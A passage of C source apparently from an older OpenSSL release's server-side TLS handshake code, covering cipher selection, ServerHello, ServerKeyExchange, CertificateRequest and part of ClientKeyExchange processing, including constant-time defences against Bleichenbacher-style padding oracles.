sk_SSL_CIPHER_free(s->session->ciphers);
s->session->ciphers=ciphers;
if (ciphers == NULL)
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_CIPHERS_PASSED);
goto f_err;
}
ciphers=NULL;
if (!tls1_set_server_sigalgs(s))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_CLIENTHELLO_TLSEXT);
goto err;
}
/* Let cert callback update server certificates if required */
retry_cert:
if (s->cert->cert_cb)
{
int rv = s->cert->cert_cb(s, s->cert->cert_cb_arg);
if (rv == 0)
{
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_CERT_CB_ERROR);
goto f_err;
}
if (rv < 0)
{
s->rwstate=SSL_X509_LOOKUP;
return -1;
}
s->rwstate = SSL_NOTHING;
}
c=ssl3_choose_cipher(s,s->session->ciphers,
SSL_get_ciphers(s));
if (c == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_SHARED_CIPHER);
goto f_err;
}
s->s3->tmp.new_cipher=c;
/* check whether we should disable session resumption */
if (s->not_resumable_session_cb != NULL)
s->session->not_resumable=s->not_resumable_session_cb(s,
((c->algorithm_mkey & (SSL_kDHE | SSL_kECDHE)) != 0));
if (s->session->not_resumable)
/* do not send a session ticket */
s->tlsext_ticket_expected = 0;
}
else
{
/* Session-id reuse */
#ifdef REUSE_CIPHER_BUG
STACK_OF(SSL_CIPHER) *sk;
SSL_CIPHER *nc=NULL;
SSL_CIPHER *ec=NULL;
if (s->options & SSL_OP_NETSCAPE_DEMO_CIPHER_CHANGE_BUG)
{
sk=s->session->ciphers;
for (i=0; i<sk_SSL_CIPHER_num(sk); i++)
{
c=sk_SSL_CIPHER_value(sk,i);
if (c->algorithm_enc & SSL_eNULL)
nc=c;
if (SSL_C_IS_EXPORT(c))
ec=c;
}
if (nc != NULL)
s->s3->tmp.new_cipher=nc;
else if (ec != NULL)
s->s3->tmp.new_cipher=ec;
else
s->s3->tmp.new_cipher=s->session->cipher;
}
else
#endif
s->s3->tmp.new_cipher=s->session->cipher;
}
if (!SSL_USE_SIGALGS(s) || !(s->verify_mode & SSL_VERIFY_PEER))
{
if (!ssl3_digest_cached_records(s))
goto f_err;
}
/*-
* we now have the following setup.
* client_random
* cipher_list - our preferred list of ciphers
* ciphers - the client's preferred list of ciphers
* compression - basically ignored right now
* ssl version is set - sslv3
* s->session - The ssl session has been setup.
* s->hit - session reuse flag
* s->s3->tmp.new_cipher- the new cipher to use.
*/
/* Handles TLS extensions that we couldn't check earlier */
if (s->version >= SSL3_VERSION)
{
if (ssl_check_clienthello_tlsext_late(s) <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_CLIENTHELLO_TLSEXT);
goto err;
}
}
if (ret < 0) ret=-ret;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
err:
if (ciphers != NULL) sk_SSL_CIPHER_free(ciphers);
return ret < 0 ? -1 : ret;
}
int ssl3_send_server_hello(SSL *s)
{
unsigned char *buf;
unsigned char *p,*d;
int i,sl;
int al = 0;
unsigned long l;
if (s->state == SSL3_ST_SW_SRVR_HELLO_A)
{
buf=(unsigned char *)s->init_buf->data;
#ifdef OPENSSL_NO_TLSEXT
p=s->s3->server_random;
if (ssl_fill_hello_random(s, 1, p, SSL3_RANDOM_SIZE) <= 0)
return -1;
#endif
/* Do the message type and length last */
d=p= ssl_handshake_start(s);
*(p++)=s->version>>8;
*(p++)=s->version&0xff;
/* Random stuff */
memcpy(p,s->s3->server_random,SSL3_RANDOM_SIZE);
p+=SSL3_RANDOM_SIZE;
/*-
* There are several cases for the session ID to send
* back in the server hello:
* - For session reuse from the session cache,
* we send back the old session ID.
* - If stateless session reuse (using a session ticket)
* is successful, we send back the client's "session ID"
* (which doesn't actually identify the session).
* - If it is a new session, we send back the new
* session ID.
* - However, if we want the new session to be single-use,
* we send back a 0-length session ID.
* s->hit is non-zero in either case of session reuse,
* so the following won't overwrite an ID that we're supposed
* to send back.
*/
if (s->session->not_resumable ||
(!(s->ctx->session_cache_mode & SSL_SESS_CACHE_SERVER)
&& !s->hit))
s->session->session_id_length=0;
sl=s->session->session_id_length;
if (sl > (int)sizeof(s->session->session_id))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_HELLO, ERR_R_INTERNAL_ERROR);
return -1;
}
*(p++)=sl;
memcpy(p,s->session->session_id,sl);
p+=sl;
/* put the cipher */
i=ssl3_put_cipher_by_char(s->s3->tmp.new_cipher,p);
p+=i;
/* put the compression method */
#ifdef OPENSSL_NO_COMP
*(p++)=0;
#else
if (s->s3->tmp.new_compression == NULL)
*(p++)=0;
else
*(p++)=s->s3->tmp.new_compression->id;
#endif
#ifndef OPENSSL_NO_TLSEXT
if (ssl_prepare_serverhello_tlsext(s) <= 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_HELLO,SSL_R_SERVERHELLO_TLSEXT);
return -1;
}
if ((p = ssl_add_serverhello_tlsext(s, p, buf+SSL3_RT_MAX_PLAIN_LENGTH, &al)) == NULL)
{
ssl3_send_alert(s, SSL3_AL_FATAL, al);
SSLerr(SSL_F_SSL3_SEND_SERVER_HELLO,ERR_R_INTERNAL_ERROR);
return -1;
}
#endif
/* do the header */
l=(p-d);
ssl_set_handshake_header(s, SSL3_MT_SERVER_HELLO, l);
s->state=SSL3_ST_SW_SRVR_HELLO_B;
}
/* SSL3_ST_SW_SRVR_HELLO_B */
return ssl_do_write(s);
}
int ssl3_send_server_done(SSL *s)
{
if (s->state == SSL3_ST_SW_SRVR_DONE_A)
{
ssl_set_handshake_header(s, SSL3_MT_SERVER_DONE, 0);
s->state = SSL3_ST_SW_SRVR_DONE_B;
}
/* SSL3_ST_SW_SRVR_DONE_B */
return ssl_do_write(s);
}
int ssl3_send_server_key_exchange(SSL *s)
{
#ifndef OPENSSL_NO_RSA
unsigned char *q;
int j,num;
RSA *rsa;
unsigned char md_buf[MD5_DIGEST_LENGTH+SHA_DIGEST_LENGTH];
unsigned int u;
#endif
#ifndef OPENSSL_NO_DH
DH *dh=NULL,*dhp;
#endif
#ifndef OPENSSL_NO_ECDH
EC_KEY *ecdh=NULL, *ecdhp;
unsigned char *encodedPoint = NULL;
int encodedlen = 0;
int curve_id = 0;
BN_CTX *bn_ctx = NULL;
#endif
EVP_PKEY *pkey;
const EVP_MD *md = NULL;
unsigned char *p,*d;
int al,i;
unsigned long type;
int n;
CERT *cert;
BIGNUM *r[4];
int nr[4],kn;
BUF_MEM *buf;
EVP_MD_CTX md_ctx;
EVP_MD_CTX_init(&md_ctx);
if (s->state == SSL3_ST_SW_KEY_EXCH_A)
{
type=s->s3->tmp.new_cipher->algorithm_mkey;
cert=s->cert;
buf=s->init_buf;
r[0]=r[1]=r[2]=r[3]=NULL;
n=0;
#ifndef OPENSSL_NO_RSA
if (type & SSL_kRSA)
{
rsa=cert->rsa_tmp;
if ((rsa == NULL) && (s->cert->rsa_tmp_cb != NULL))
{
rsa=s->cert->rsa_tmp_cb(s,
SSL_C_IS_EXPORT(s->s3->tmp.new_cipher),
SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher));
if(rsa == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_ERROR_GENERATING_TMP_RSA_KEY);
goto f_err;
}
RSA_up_ref(rsa);
cert->rsa_tmp=rsa;
}
if (rsa == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_TMP_RSA_KEY);
goto f_err;
}
r[0]=rsa->n;
r[1]=rsa->e;
s->s3->tmp.use_rsa_tmp=1;
}
else
#endif
#ifndef OPENSSL_NO_DH
if (type & SSL_kDHE)
{
if (s->cert->dh_tmp_auto)
{
dhp = ssl_get_auto_dh(s);
if (dhp == NULL)
{
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto f_err;
}
}
else
dhp=cert->dh_tmp;
if ((dhp == NULL) && (s->cert->dh_tmp_cb != NULL))
dhp=s->cert->dh_tmp_cb(s,
SSL_C_IS_EXPORT(s->s3->tmp.new_cipher),
SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher));
if (dhp == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_TMP_DH_KEY);
goto f_err;
}
if (!ssl_security(s, SSL_SECOP_TMP_DH,
DH_security_bits(dhp), 0, dhp))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_DH_KEY_TOO_SMALL);
goto f_err;
}
if (s->s3->tmp.dh != NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_R_INTERNAL_ERROR);
goto err;
}
if (s->cert->dh_tmp_auto)
dh = dhp;
else if ((dh=DHparams_dup(dhp)) == NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_DH_LIB);
goto err;
}
s->s3->tmp.dh=dh;
if ((dhp->pub_key == NULL ||
dhp->priv_key == NULL ||
(s->options & SSL_OP_SINGLE_DH_USE)))
{
if(!DH_generate_key(dh))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
ERR_R_DH_LIB);
goto err;
}
}
else
{
dh->pub_key=BN_dup(dhp->pub_key);
dh->priv_key=BN_dup(dhp->priv_key);
if ((dh->pub_key == NULL) ||
(dh->priv_key == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_DH_LIB);
goto err;
}
}
r[0]=dh->p;
r[1]=dh->g;
r[2]=dh->pub_key;
}
else
#endif
#ifndef OPENSSL_NO_ECDH
if (type & SSL_kECDHE)
{
const EC_GROUP *group;
ecdhp=cert->ecdh_tmp;
if (s->cert->ecdh_tmp_auto)
{
/* Get NID of appropriate shared curve */
int nid = tls1_shared_curve(s, -2);
if (nid != NID_undef)
ecdhp = EC_KEY_new_by_curve_name(nid);
}
else if ((ecdhp == NULL) && s->cert->ecdh_tmp_cb)
{
ecdhp=s->cert->ecdh_tmp_cb(s,
SSL_C_IS_EXPORT(s->s3->tmp.new_cipher),
SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher));
}
if (ecdhp == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_TMP_ECDH_KEY);
goto f_err;
}
if (s->s3->tmp.ecdh != NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_R_INTERNAL_ERROR);
goto err;
}
/* Duplicate the ECDH structure. */
if (ecdhp == NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
if (s->cert->ecdh_tmp_auto)
ecdh = ecdhp;
else if ((ecdh = EC_KEY_dup(ecdhp)) == NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
s->s3->tmp.ecdh=ecdh;
if ((EC_KEY_get0_public_key(ecdh) == NULL) ||
(EC_KEY_get0_private_key(ecdh) == NULL) ||
(s->options & SSL_OP_SINGLE_ECDH_USE))
{
if(!EC_KEY_generate_key(ecdh))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
}
if (((group = EC_KEY_get0_group(ecdh)) == NULL) ||
(EC_KEY_get0_public_key(ecdh) == NULL) ||
(EC_KEY_get0_private_key(ecdh) == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
if (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher) &&
(EC_GROUP_get_degree(group) > 163))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_ECGROUP_TOO_LARGE_FOR_CIPHER);
goto err;
}
/* XXX: For now, we only support ephemeral ECDH
* keys over named (not generic) curves. For
* supported named curves, curve_id is non-zero.
*/
if ((curve_id =
tls1_ec_nid2curve_id(EC_GROUP_get_curve_name(group)))
== 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_UNSUPPORTED_ELLIPTIC_CURVE);
goto err;
}
/* Encode the public key.
* First check the size of encoding and
* allocate memory accordingly.
*/
encodedlen = EC_POINT_point2oct(group,
EC_KEY_get0_public_key(ecdh),
POINT_CONVERSION_UNCOMPRESSED,
NULL, 0, NULL);
encodedPoint = (unsigned char *)
OPENSSL_malloc(encodedlen*sizeof(unsigned char));
bn_ctx = BN_CTX_new();
if ((encodedPoint == NULL) || (bn_ctx == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
encodedlen = EC_POINT_point2oct(group,
EC_KEY_get0_public_key(ecdh),
POINT_CONVERSION_UNCOMPRESSED,
encodedPoint, encodedlen, bn_ctx);
if (encodedlen == 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
BN_CTX_free(bn_ctx); bn_ctx=NULL;
/* XXX: For now, we only support named (not
* generic) curves in ECDH ephemeral key exchanges.
* In this situation, we need four additional bytes
* to encode the entire ServerECDHParams
* structure.
*/
n = 4 + encodedlen;
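/* For reference, those four bytes are the ServerECDHParams framing
* written further below: 1 byte curve type (named_curve), 2 bytes of
* curve id, and 1 byte for the length of the encoded point.
*/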
/* We'll generate the serverKeyExchange message
* explicitly so we can set these to NULLs
*/
r[0]=NULL;
r[1]=NULL;
r[2]=NULL;
r[3]=NULL;
}
else
#endif /* !OPENSSL_NO_ECDH */
#ifndef OPENSSL_NO_PSK
if (type & SSL_kPSK)
{
/* reserve size for record length and PSK identity hint */
n+=2+strlen(s->ctx->psk_identity_hint);
}
else
#endif /* !OPENSSL_NO_PSK */
#ifndef OPENSSL_NO_SRP
if (type & SSL_kSRP)
{
if ((s->srp_ctx.N == NULL) ||
(s->srp_ctx.g == NULL) ||
(s->srp_ctx.s == NULL) ||
(s->srp_ctx.B == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_SRP_PARAM);
goto err;
}
r[0]=s->srp_ctx.N;
r[1]=s->srp_ctx.g;
r[2]=s->srp_ctx.s;
r[3]=s->srp_ctx.B;
}
else
#endif
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_UNKNOWN_KEY_EXCHANGE_TYPE);
goto f_err;
}
for (i=0; i < 4 && r[i] != NULL; i++)
{
nr[i]=BN_num_bytes(r[i]);
#ifndef OPENSSL_NO_SRP
if ((i == 2) && (type & SSL_kSRP))
n+=1+nr[i];
else
#endif
n+=2+nr[i];
}
if (!(s->s3->tmp.new_cipher->algorithm_auth & (SSL_aNULL|SSL_aSRP))
&& !(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK))
{
if ((pkey=ssl_get_sign_pkey(s,s->s3->tmp.new_cipher,&md))
== NULL)
{
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
kn=EVP_PKEY_size(pkey);
}
else
{
pkey=NULL;
kn=0;
}
if (!BUF_MEM_grow_clean(buf,n+SSL_HM_HEADER_LENGTH(s)+kn))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_LIB_BUF);
goto err;
}
d = p = ssl_handshake_start(s);
for (i=0; i < 4 && r[i] != NULL; i++)
{
#ifndef OPENSSL_NO_SRP
if ((i == 2) && (type & SSL_kSRP))
{
*p = nr[i];
p++;
}
else
#endif
s2n(nr[i],p);
BN_bn2bin(r[i],p);
p+=nr[i];
}
#ifndef OPENSSL_NO_ECDH
if (type & SSL_kECDHE)
{
/* XXX: For now, we only support named (not generic) curves.
* In this situation, the serverKeyExchange message has:
* [1 byte CurveType], [2 byte CurveName]
* [1 byte length of encoded point], followed by
* the actual encoded point itself
*/
*p = NAMED_CURVE_TYPE;
p += 1;
*p = 0;
p += 1;
*p = curve_id;
p += 1;
*p = encodedlen;
p += 1;
memcpy((unsigned char*)p,
(unsigned char *)encodedPoint,
encodedlen);
OPENSSL_free(encodedPoint);
encodedPoint = NULL;
p += encodedlen;
}
#endif
#ifndef OPENSSL_NO_PSK
if (type & SSL_kPSK)
{
/* copy PSK identity hint */
s2n(strlen(s->ctx->psk_identity_hint), p);
strncpy((char *)p, s->ctx->psk_identity_hint, strlen(s->ctx->psk_identity_hint));
p+=strlen(s->ctx->psk_identity_hint);
}
#endif
/* not anonymous */
if (pkey != NULL)
{
/* n is the length of the params, they start at d
* and p points to the space at the end. */
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA && !SSL_USE_SIGALGS(s))
{
q=md_buf;
j=0;
for (num=2; num > 0; num--)
{
EVP_MD_CTX_set_flags(&md_ctx,
EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
EVP_DigestInit_ex(&md_ctx,(num == 2)
?s->ctx->md5:s->ctx->sha1, NULL);
EVP_DigestUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,d,n);
EVP_DigestFinal_ex(&md_ctx,q,
(unsigned int *)&i);
q+=i;
j+=i;
}
if (RSA_sign(NID_md5_sha1, md_buf, j,
&(p[2]), &u, pkey->pkey.rsa) <= 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_LIB_RSA);
goto err;
}
s2n(u,p);
n+=u+2;
}
else
#endif
if (md)
{
/* send signature algorithm */
if (SSL_USE_SIGALGS(s))
{
if (!tls12_get_sigandhash(p, pkey, md))
{
/* Should never happen */
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto f_err;
}
p+=2;
}
#ifdef SSL_DEBUG
fprintf(stderr, "Using hash %s\n",
EVP_MD_name(md));
#endif
EVP_SignInit_ex(&md_ctx, md, NULL);
EVP_SignUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_SignUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_SignUpdate(&md_ctx,d,n);
if (!EVP_SignFinal(&md_ctx,&(p[2]),
(unsigned int *)&i,pkey))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_LIB_EVP);
goto err;
}
s2n(i,p);
n+=i+2;
if (SSL_USE_SIGALGS(s))
n+= 2;
}
else
{
/* Is this error check actually needed? */
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_UNKNOWN_PKEY_TYPE);
goto f_err;
}
}
ssl_set_handshake_header(s, SSL3_MT_SERVER_KEY_EXCHANGE, n);
}
s->state = SSL3_ST_SW_KEY_EXCH_B;
EVP_MD_CTX_cleanup(&md_ctx);
return ssl_do_write(s);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
err:
#ifndef OPENSSL_NO_ECDH
if (encodedPoint != NULL) OPENSSL_free(encodedPoint);
BN_CTX_free(bn_ctx);
#endif
EVP_MD_CTX_cleanup(&md_ctx);
return(-1);
}
int ssl3_send_certificate_request(SSL *s)
{
unsigned char *p,*d;
int i,j,nl,off,n;
STACK_OF(X509_NAME) *sk=NULL;
X509_NAME *name;
BUF_MEM *buf;
if (s->state == SSL3_ST_SW_CERT_REQ_A)
{
buf=s->init_buf;
d=p=ssl_handshake_start(s);
/* get the list of acceptable cert types */
p++;
n=ssl3_get_req_cert_type(s,p);
d[0]=n;
p+=n;
n++;
if (SSL_USE_SIGALGS(s))
{
const unsigned char *psigs;
unsigned char *etmp = p;
nl = tls12_get_psigalgs(s, &psigs);
/* Skip over length for now */
p += 2;
nl = tls12_copy_sigalgs(s, p, psigs, nl);
/* Now fill in length */
s2n(nl, etmp);
p += nl;
n += nl + 2;
}
off=n;
p+=2;
n+=2;
sk=SSL_get_client_CA_list(s);
nl=0;
if (sk != NULL)
{
for (i=0; i<sk_X509_NAME_num(sk); i++)
{
name=sk_X509_NAME_value(sk,i);
j=i2d_X509_NAME(name,NULL);
if (!BUF_MEM_grow_clean(buf,SSL_HM_HEADER_LENGTH(s)+n+j+2))
{
SSLerr(SSL_F_SSL3_SEND_CERTIFICATE_REQUEST,ERR_R_BUF_LIB);
goto err;
}
p = ssl_handshake_start(s) + n;
if (!(s->options & SSL_OP_NETSCAPE_CA_DN_BUG))
{
s2n(j,p);
i2d_X509_NAME(name,&p);
n+=2+j;
nl+=2+j;
}
else
{
d=p;
i2d_X509_NAME(name,&p);
j-=2; s2n(j,d); j+=2;
n+=j;
nl+=j;
}
}
}
/* else no CA names */
p = ssl_handshake_start(s) + off;
s2n(nl,p);
ssl_set_handshake_header(s, SSL3_MT_CERTIFICATE_REQUEST, n);
#ifdef NETSCAPE_HANG_BUG
if (!SSL_IS_DTLS(s))
{
if (!BUF_MEM_grow_clean(buf, s->init_num + 4))
{
SSLerr(SSL_F_SSL3_SEND_CERTIFICATE_REQUEST,ERR_R_BUF_LIB);
goto err;
}
p=(unsigned char *)s->init_buf->data + s->init_num;
/* do the header */
*(p++)=SSL3_MT_SERVER_DONE;
*(p++)=0;
*(p++)=0;
*(p++)=0;
s->init_num += 4;
}
#endif
s->state = SSL3_ST_SW_CERT_REQ_B;
}
/* SSL3_ST_SW_CERT_REQ_B */
return ssl_do_write(s);
err:
return(-1);
}
int ssl3_get_client_key_exchange(SSL *s)
{
int i,al,ok;
long n;
unsigned long alg_k;
unsigned char *p;
#ifndef OPENSSL_NO_RSA
RSA *rsa=NULL;
EVP_PKEY *pkey=NULL;
#endif
#ifndef OPENSSL_NO_DH
BIGNUM *pub=NULL;
DH *dh_srvr, *dh_clnt = NULL;
#endif
#ifndef OPENSSL_NO_KRB5
KSSL_ERR kssl_err;
#endif /* OPENSSL_NO_KRB5 */
#ifndef OPENSSL_NO_ECDH
EC_KEY *srvr_ecdh = NULL;
EVP_PKEY *clnt_pub_pkey = NULL;
EC_POINT *clnt_ecpoint = NULL;
BN_CTX *bn_ctx = NULL;
#endif
n=s->method->ssl_get_message(s,
SSL3_ST_SR_KEY_EXCH_A,
SSL3_ST_SR_KEY_EXCH_B,
SSL3_MT_CLIENT_KEY_EXCHANGE,
2048, /* ??? */
&ok);
if (!ok) return((int)n);
p=(unsigned char *)s->init_msg;
alg_k=s->s3->tmp.new_cipher->algorithm_mkey;
#ifndef OPENSSL_NO_RSA
if (alg_k & SSL_kRSA)
{
unsigned char rand_premaster_secret[SSL_MAX_MASTER_KEY_LENGTH];
int decrypt_len;
unsigned char decrypt_good, version_good;
size_t j;
/* FIX THIS UP EAY EAY EAY EAY */
if (s->s3->tmp.use_rsa_tmp)
{
if ((s->cert != NULL) && (s->cert->rsa_tmp != NULL))
rsa=s->cert->rsa_tmp;
/* Don't do a callback because rsa_tmp should
* be sent already */
if (rsa == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_RSA_PKEY);
goto f_err;
}
}
else
{
pkey=s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey;
if ( (pkey == NULL) ||
(pkey->type != EVP_PKEY_RSA) ||
(pkey->pkey.rsa == NULL))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_RSA_CERTIFICATE);
goto f_err;
}
rsa=pkey->pkey.rsa;
}
/* TLS and [incidentally] DTLS{0xFEFF} */
if (s->version > SSL3_VERSION && s->version != DTLS1_BAD_VER)
{
n2s(p,i);
if (n != i+2)
{
if (!(s->options & SSL_OP_TLS_D5_BUG))
{
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_TLS_RSA_ENCRYPTED_VALUE_LENGTH_IS_WRONG);
goto f_err;
}
else
p-=2;
}
else
n=i;
}
/*
* Reject overly short RSA ciphertext because we want to be sure
* that the buffer size makes it safe to iterate over the entire
* size of a premaster secret (SSL_MAX_MASTER_KEY_LENGTH). The
* actual expected size is larger due to RSA padding, but the
* bound is sufficient to be safe.
*/
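/* (SSL_MAX_MASTER_KEY_LENGTH is 48 here: a TLS RSA premaster secret
* is the 2-byte client_version followed by 46 random bytes.)
*/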
if (n < SSL_MAX_MASTER_KEY_LENGTH)
{
al = SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, SSL_R_TLS_RSA_ENCRYPTED_VALUE_LENGTH_IS_WRONG);
goto f_err;
}
/* We must not leak whether a decryption failure occurs because
* of Bleichenbacher's attack on PKCS #1 v1.5 RSA padding (see
* RFC 2246, section 7.4.7.1). The code follows that advice of
* the TLS RFC and generates a random premaster secret for the
* case that the decrypt fails. See
* https://tools.ietf.org/html/rfc5246#section-7.4.7.1 */
/* should be RAND_bytes, but we cannot work around a failure. */
if (RAND_pseudo_bytes(rand_premaster_secret,
sizeof(rand_premaster_secret)) <= 0)
goto err;
decrypt_len = RSA_private_decrypt((int)n,p,p,rsa,RSA_PKCS1_PADDING);
ERR_clear_error();
/* decrypt_len should be SSL_MAX_MASTER_KEY_LENGTH.
* decrypt_good will be 0xff if so and zero otherwise. */
decrypt_good = constant_time_eq_int_8(decrypt_len, SSL_MAX_MASTER_KEY_LENGTH);
/* If the version in the decrypted pre-master secret is correct
* then version_good will be 0xff, otherwise it'll be zero.
* The Klima-Pokorny-Rosa extension of Bleichenbacher's attack
* (http://eprint.iacr.org/2003/052/) exploits the version
* number check as a "bad version oracle". Thus version checks
* are done in constant time and are treated like any other
* decryption error. */
version_good = constant_time_eq_8(p[0], (unsigned)(s->client_version>>8));
version_good &= constant_time_eq_8(p[1], (unsigned)(s->client_version&0xff));
/* The premaster secret must contain the same version number as
* the ClientHello to detect version rollback attacks
* (strangely, the protocol does not offer such protection for
* DH ciphersuites). However, buggy clients exist that send the
* negotiated protocol version instead if the server does not
* support the requested protocol version. If
* SSL_OP_TLS_ROLLBACK_BUG is set, tolerate such clients. */
if (s->options & SSL_OP_TLS_ROLLBACK_BUG)
{
unsigned char workaround_good;
workaround_good = constant_time_eq_8(p[0], (unsigned)(s->version>>8));
workaround_good &= constant_time_eq_8(p[1], (unsigned)(s->version&0xff));
version_good |= workaround_good;
}
/* Both decryption and version must be good for decrypt_good
* to remain non-zero (0xff). */
decrypt_good &= version_good;
/*
* Now copy rand_premaster_secret over from p using
* decrypt_good. If decryption failed, then p does not
* contain valid plaintext, however, a check above guarantees
* it is still sufficiently large to read from.
*/
for (j = 0; j < sizeof(rand_premaster_secret); j++)
{
p[j] = constant_time_select_8(decrypt_good, p[j],
rand_premaster_secret[j]);
}
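/* constant_time_select_8(mask, a, b) yields a when mask is all ones
* (0xff) and b when it is zero, roughly (mask & a) | (~mask & b), so
* the loop above either keeps the decrypted bytes or silently swaps
* in the random premaster without branching on secret data.
*/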
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,
p,sizeof(rand_premaster_secret));
OPENSSL_cleanse(p,sizeof(rand_premaster_secret));
}
else
#endif
#ifndef OPENSSL_NO_DH
if (alg_k & (SSL_kDHE|SSL_kDHr|SSL_kDHd))
{
int idx = -1;
EVP_PKEY *skey = NULL;
if (n)
n2s(p,i);
else
i = 0;
if (n && n != i+2)
{
if (!(s->options & SSL_OP_SSLEAY_080_CLIENT_DH_BUG))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_DH_PUBLIC_VALUE_LENGTH_IS_WRONG);
goto err;
}
else
{
p-=2;
i=(int)n;
}
}
if (alg_k & SSL_kDHr)
idx = SSL_PKEY_DH_RSA;
else if (alg_k & SSL_kDHd)
idx = SSL_PKEY_DH_DSA;
if (idx >= 0)
{
skey = s->cert->pkeys[idx].privatekey;
if ((skey == NULL) ||
(skey->type != EVP_PKEY_DH) ||
(skey->pkey.dh == NULL))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_RSA_CERTIFICATE);
goto f_err;
}
dh_srvr = skey->pkey.dh;
}
else if (s->s3->tmp.dh == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_DH_KEY);
goto f_err;
}
else
dh_srvr=s->s3->tmp.dh;
if (n == 0L)
{
/* Get pubkey from cert */
EVP_PKEY *clkey=X509_get_pubkey(s->session->peer);
if (clkey)
{
if (EVP_PKEY_cmp_parameters(clkey, skey) == 1)
